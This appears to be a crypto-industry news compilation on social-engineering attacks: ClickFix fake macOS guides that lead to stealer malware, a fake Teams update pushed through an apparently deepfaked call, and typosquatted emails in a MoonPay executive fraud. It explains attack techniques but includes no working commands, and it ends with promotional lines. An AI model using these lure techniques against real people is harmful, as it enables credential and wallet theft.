Attackers are posting fake macOS troubleshooting guides on Medium, Craft, and Squarespace. The goal is to make users run Terminal commands that install malware targeting iCloud data, saved passwords, and crypto wallets.
Microsoft’s Defender Security Research Team published the findings. The campaign has been running since late 2025. It preys on Mac users searching for help with common problems like freeing up disk space or fixing system errors.
Instead of offering a legit fix, the pages tell users to copy a command and paste it into Terminal. That command pulls down and runs malware.
The misleading blog posts tell readers to copy a malicious command and paste it into Terminal. This command downloads malware and runs it on the victim’s computer.
The technique is called ClickFix. It’s social engineering that changes responsibility for launching the payload onto the victim. Because the user runs the command directly in Terminal, macOS Gatekeeper never inspects the payload.
Gatekeeper normally checks code signing and notarization on app bundles opened through Finder, but this method sidesteps it entirely.
Attackers launched three campaigns with the same goal
Microsoft spotted three campaign installers:
A loader.
A script.
A helper.
All three harvest sensitive data, establish persistence, and exfiltrate stolen information to the attacker’s servers.
The malware families include AMOS, Macsync, and SHub Stealer. If any one of the three malware was installed, it goes after iCloud and Telegram account data. Then it looks for private documents and photos under 2 MB. And it extracts crypto wallet keys from Exodus, Ledger, and Trezor, and steals saved usernames and passwords from Chrome and Firefox.
After installation, the malware throws up a fake dialog and asks for a system password to install a “helper tool.” If the user enters the password, the attacker gets full access to files and system settings.
In some cases, researchers found that attackers deleted legitimate crypto wallet apps and replaced them with trojanized versions designed to monitor transactions and steal funds.
Trezor Suite, Ledger Wallet, and Exodus were some of the main apps targeted in this attack.
The loader campaign also includes a kill switch. The malware stops executing if it detects a Russian keyboard layout.
Security researchers observed attackers using curl, osascript, and other native macOS utilities to run payloads directly in memory. This is a fileless approach that makes detection harder for standard antivirus tools.
Attackers go after crypto developers
Security researchers from ANY[.]RUN discovered a Lazarus Group operation called “Mach-O Man.” Hackers used the same ClickFix technique through fake meeting invitations. They went after fintech and crypto machines where macOS is common.
Cryptopolitan published about the PromptMink campaign.
A malicious npm package was put into a crypto trading project by the North Korean group Famous Chollima through an AI-generated change. Using a two-layer package approach, the malware got access to wallet data and system secrets.
Both campaigns show that crypto wallet data is valuable. Attackers are adapting their delivery methods from fake blog posts to AI-assisted supply chain compromises to reach it.
There’s a middle ground between leaving money in the bank and rolling the dice in crypto. Start with this free video on decentralized finance.
A crypto founder had his laptop compromised when he joined what appeared to be a Microsoft Teams call with Pierre Kaklamanos, a Cardano Foundation contact he had spoken with before.
When “Pierre” reached out about Atrium and sent a Teams invite, nothing looked out of place. On the call, the face and voice matched what he remembered, and two other apparent foundation members were present.
When the call lagged and dropped him, a prompt told him his Teams software was out of date and needed reinstalling through Terminal. He ran the command, then shut the laptop off because the battery was dying, which limited the damage in retrospect.
He describes himself as “quite technically savvy,” which is part of the point that the attack worked because the context felt legitimate.
Social engineers have always relied on familiarity, and executing that at scale once required either a compromised account or weeks of text-based rapport-building.
The video call was the authentication layer, the thing victims learned to trust, and replicating it is now within reach.
Fake update
Microsoft documented campaigns in February and March 2026 in which malicious files masqueraded as workplace apps, such as msteams.exe and zoomworkspace.clientsetup.exe, with phishing lures that mimicked legitimate Teams and Zoom meeting workflows.
In a separate warning, Microsoft described “ClickFix”-style prompts targeting macOS users, instructing them to paste commands into Terminal and targeting browser passwords, crypto wallets, cloud credentials, and developer keys.
The fake Teams update fits both patterns simultaneously.
Mandiant said it could not independently verify which AI model, if any, generated the video, but confirmed the group used fake meetings and AI tools during social engineering.
On Apr. 24, the real Pierre Kaklamanos posted on X saying his Telegram had been hacked and that someone was impersonating him, along with “a few other people in the industry this week.”
He told followers to avoid clicking links or booking meetings through the account and to verify contact through LinkedIn direct messages.
By then, the founder had already messaged the account suggesting they switch to Google Meet. Whoever controlled Pierre’s Telegram account replied that he had gotten busy and asked to reschedule, with the attacker still managing the persona once the call ended.
That exchange turns the incident from an isolated embarrassment into a live campaign signal that the method is active, the account compromise is the entry point, and the relationship history is the weapon.
Stage
What the victim saw
Why it looked legitimate
What the attacker was likely trying to achieve
Initial outreach
“Pierre” reached out about Atrium and suggested a call
The victim had spoken with Pierre before, including on video
Reopen an existing trust relationship instead of starting from a cold approach
Meeting setup
A Microsoft Teams invite for the next day
Teams is a normal business workflow and the topic was plausible
Move the target into a controlled environment that felt routine
Live call
Familiar face, familiar voice, plus two other apparent Cardano Foundation members
The social context matched the victim’s memory of prior interactions
Lower suspicion and make the call itself feel like verification
Call disruption
Lagging, instability, then getting kicked out
Technical glitches are common in video calls
Create frustration and set up the fake “fix” as a normal troubleshooting step
Fake update prompt
A message saying Teams was out of date and needed reinstalling through Terminal
Software update prompts are familiar, and the user rarely used Teams
Get the victim to execute a malicious command directly
Command execution
The victim ran the command, then shut down the laptop because the battery was dying
The workflow still felt like a routine app fix at that moment
Launch the infection chain and gain access to credentials or device data
Post-call follow-up
The victim suggested switching to Google Meet; the attacker said he got busy and asked to reschedule
The persona continued behaving like a real contact after the failed attempt
Keep the relationship alive for another attempt and avoid immediate suspicion
Why generative media changes the threat surface
The founder said he now believes the call may have involved AI-generated or manipulated video. Forensic confirmation of the tools is lacking, and the OpenAI connection here is governed by its own safety documentation.
OpenAI launched its 4o image generation model on Mar. 25, describing it as capable of “precise, accurate, photorealistic outputs,” and released the ChatGPT Images 2.0 System Card on Apr. 21.
The firm stated that the model’s “heightened realism” could, absent safeguards, enable more convincing deepfakes of real people, places, or events. One of the leading AI labs has now put on record that its own image model raises the ceiling on what a convincing fake can look like.
The World Economic Forum said in January 2026 that generative AI lowers the barrier to phishing while raising its credibility, through realistic deepfake audio and video that can evade both detection systems and human scrutiny.
INTERPOL declared financial fraud one of the world’s most severe and rapidly evolving transnational crimes in March 2026, identifying deepfake videos, audio, and chatbots as tools that make impersonation of trusted people easier to carry out at scale.
Chainalysis data shows crypto scams reached $17 billion in 2025, impersonation scams up 1,400%, and AI-enabled scams generating 4.5 times traditional revenue.
Crypto attracts this class of attack because it combines high-value targets, fast settlement rails, and an informal communications culture in which Telegram introductions and ad hoc video calls between founders are routine.
Mandiant documented that the group behind the crypto Zoom intrusion targeted software firms, developers, venture firms, and executives across payments, brokerage, staking, and wallet infrastructure.
Mandiant noted that the victim’s data could be used to seed future social engineering, with each compromise generating material for the next.
Two paths forward
Zoom announced on Apr. 17 a partnership to add real-time human verification to meetings, a “Verified Human” badge, and a “Deep Face Waiting Room,” treating participant authenticity as a product problem.
In the bull case, that buildout reaches critical mass quickly enough that attackers must defeat multiple independent trust layers to complete a conversion, and the economics of impersonation campaigns deteriorate.
In the bear case, the timeline compresses before defenses do. Gartner warned that AI agents may halve the time required to exploit account takeovers by 2027, narrowing the window for human hesitation or security team intervention.
Deloitte estimated that generative AI-enabled fraud losses in the US alone could climb from roughly $12 billion in 2023 to $40 billion by 2027.
Scenario
What changes
What stays vulnerable
Implication for crypto firms
Bull case
Verification tools spread quickly: human-verification badges, liveness checks, stronger internal trust rails, and more formal approval workflows
Informal founder-to-founder chats, legacy messaging habits, and ad hoc scheduling still create openings
Attackers face more friction and lower conversion rates because they must defeat several trust layers instead of one
Bear case
AI-generated impersonation improves faster than defenses are adopted; fake meetings and fake troubleshooting become standard playbooks
Public-facing executives, Telegram-based outreach, video-first verification habits, and staff under time pressure
Relationship hijacking becomes routine, and each compromise creates material for the next scam
What success looks like
Sensitive requests get verified across separate channels, with known numbers, shared passphrases, hardware keys, or pre-agreed internal systems
Social pressure, urgency, and trust in familiar faces and voices cannot be fully removed
Firms reduce the chance that one spoofed call can lead directly to compromise
What failure looks like
Teams rely on the call itself as proof of identity, even as deepfake and impersonation tools improve
Video remains persuasive even when it is no longer reliable as authentication
Crypto organizations become easier to target because executives are both high-value victims and reusable lure assets
Every public-facing crypto executive becomes both a target and a lure asset, a source of voice recordings, video clips, and relationship graphs that attackers can deploy against the next victim.
Zoom is building liveness checks into meetings, Microsoft is documenting attack chains that impersonate its own software, and the FBI has warned that malicious actors are already using AI-generated voice and text to impersonate trusted contacts, advising against assuming a message is authentic because it appears to come from a known person.
Verification now requires independent rails, such as a known phone number, a hardware key, a shared passphrase established before any meeting, or a pre-agreed internal channel that no attacker has accessed.
Two top executives of MoonPay, a major cryptocurrency payments company, reportedly became victims of an elaborate online fraud that led to them losing $250,300, a recent filing with the US Department of Justice (DOJ) reads.
The filing, filed to recover 40,350 USDT (a stablecoin pegged to the value of the US dollar) that crypto company Tether is currently holding in frozen accounts, refers to the victims only as “Ivan” and “Mouna.” But coverage from crypto outlet NOTUS suggests they are Ivan Soto-Wright, co-founder and chief executive of MoonPay, and Mouna Ammari Siala, the company’s chief financial officer.
The DOJ says that the two executives were scammed into moving funds to an account controlled by an individual they believed was Steve Witkoff, a high-profile US real estate developer and co-chair of President Donald Trump’s 2017 inaugural committee.
Blockchain data analysis indicates that the USDT was transferred to a wallet associated with Binance. The wallet is associated with Ehiremen Aigbokhan, a Nigerian citizen residing in Lagos.
The episode represents an unusual public case in which senior industry players, who had access to advanced crypto tools and security protocols, proved to be as susceptible to what investigators call a fairly simple form of social engineering as the average rank-and-file email user.
Scammer employed ‘insulting typo’ to imitate a public figure
Unlike other crypto-crimes that rely on hacking or exploiting blockchain vulnerabilities (and perhaps for that reason alone), this scam was executed through deception through discreet email manipulation.
The scammers employed bogus email addresses nearly identical to correct ones — substituting a capital “I” for a lowercase “l” in domain names — to deceive their targets. In this situation, emails were sent from steve_witkoff@t47lnaugural.com and financersvp@t47lnaugural.com — addresses spoofing the names of well-known people and events.
This practice, called typosquatting, is used frequently in phishing scams and has proven effective at scamming even professionals who are security aware.
“IP geolocation data consistently showed emails from these accounts originating from Nigeria, and not the United States,” the DOJ filing says. According to the authorities, Aigbokhan likely obtained the USDT due to a scam involving an international money transfer in the US.
The con artists didn’t have to hack into or exploit the blockchain in any way; they only needed a ruse and a convincing pitch to steal the funds.
Wallet activity raises further doubts about MoonPay
The filing noted that one of the wallets involved in the scam is a marked MoonPay wallet on Etherscan, suggesting that the individuals affected are likely Ivan Soto-Wright and Mouna Ammari Siala.
As of press time, MoonPay has not yet publicly replied to requests for comment from multiple outlets, including The Block and NOTUS.
The timing of the case is particularly delicate. And in the latest expansion, MoonPay, a popular payment infrastructure for cryptocurrency purchases, made its services available in only a few US states. Still, last month, the NYDFS granted it a BitLicense, which has the consequence of allowing the company to operate in all 50 United States. It is one of the most difficult-to-obtain crypto regulatory licenses in the US and vital for doing business in the financial capital.
The incident may raise additional questions about MoonPay’s internal security controls, vetting processes, and executive oversight, particularly if the victims in this case had indeed used the official company wallets to conduct what seem to be personal or poorly vetted transactions.
Amid the boom in crypto adoption, the case is a sobering reminder that no one is immune to digital fraud, not even the executives of companies that help build the infrastructure of the crypto economy.
KEY Difference Wire helps crypto brands break through and dominate headlines fast
